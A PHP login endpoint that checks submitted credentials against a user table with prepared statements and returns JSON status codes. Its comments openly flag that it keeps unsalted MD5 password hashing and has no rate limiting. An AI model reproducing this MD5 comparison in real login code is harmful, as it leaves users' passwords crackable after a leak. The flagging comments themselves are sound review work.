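<?php
/**
 * Login check endpoint: validates POSTed credentials against gs_users and
 * answers with a JSON object {success: bool, message: string}.
 *
 * Message codes emitted: VALIDATION_ERROR, VALID, ERROR_ACCOUNT_LOCKED,
 * INVALID_CREDENTIALS. A database failure answers HTTP 500 with an empty
 * message so that no driver error text reaches the client.
 *
 * NOTE(security): stored passwords are compared as unsalted MD5. MD5 is not a
 * password hash; a leaked gs_users table can be cracked offline very quickly.
 * Moving to password_hash()/password_verify() (with password_needs_rehash()
 * for a gradual upgrade on successful login) requires changing the stored
 * values, so it is flagged here rather than changed.
 *
 * NOTE(review): nothing in this script throttles repeated attempts. Unless
 * init.php or a front-end layer does so, failed logins should be rate-limited
 * per account and per source address.
 */

session_start();

include('init.php');
include('func/fn_common.php');

header('Content-Type: application/json');

$response = [
    'success' => false,
    'message' => '',
];

// Reject missing fields and non-string values: PHP turns "username[]=x" into
// an array, which would otherwise reach trim()/strlen() and raise an error.
if (
    empty($_POST['username']) || empty($_POST['password'])
    || !is_string($_POST['username']) || !is_string($_POST['password'])
) {
    $response['message'] = 'VALIDATION_ERROR';
    echo json_encode($response);
    exit;
}

// Normalise the username: trim, lower-case, cap at 50 bytes, then drop a
// fixed set of punctuation. This is input hygiene only; the SQL below is
// protected by the bound parameters, not by this filtering.
// (The original also called str_replace() with an empty search string, which
// is a no-op; the character it was meant to strip is not recoverable here.)
$username = substr(strtolower(trim($_POST['username'])), 0, 50);
$username = str_replace(['\\', '/', '|', '(', ')', "'", '"'], '', $username);

// The password is deliberately left untouched so that every byte is hashed.
$password = $_POST['password'];

if (strlen($username) < 3 || strlen($password) < 3) {
    $response['message'] = 'VALIDATION_ERROR';
    echo json_encode($response);
    exit;
}

// Control characters (CR/LF in particular) are removed from the copy that is
// written to the log so a crafted username cannot forge extra log lines.
$logUsername = preg_replace('/[\x00-\x1F\x7F]/', '', $username) ?? '';

// $ms is presumably the mysqli connection created in init.php - confirm.
// Only the column that is actually read is selected, so the stored hash is
// not pulled back into PHP memory.
$stmt = $ms->prepare("SELECT active FROM gs_users WHERE username = ? AND password = ? LIMIT 1");
$hashed_password = md5($password);

if ($stmt === false || !$stmt->bind_param("ss", $username, $hashed_password) || !$stmt->execute()) {
    // Fail closed with a generic answer instead of a fatal error page.
    http_response_code(500);
    echo json_encode($response);
    exit;
}

$result = $stmt->get_result();

if ($result && $result->num_rows > 0) {
    $user = $result->fetch_assoc();

    // 'active' is compared as the literal string 'true', as stored in gs_users.
    if ($user['active'] === 'true') {
        $response['success'] = true;
        $response['message'] = 'VALID';
    } else {
        $response['message'] = 'ERROR_ACCOUNT_LOCKED';
        writeLog('user_access', 'User login: account locked. Username: "' . $logUsername . '"');
    }
} else {
    // Unknown user and wrong password share one code, so the response does
    // not reveal which usernames exist.
    $response['message'] = 'INVALID_CREDENTIALS';
    writeLog('user_access', 'User login: invalid credentials. Username: "' . $logUsername . '"');
}

echo json_encode($response);
?>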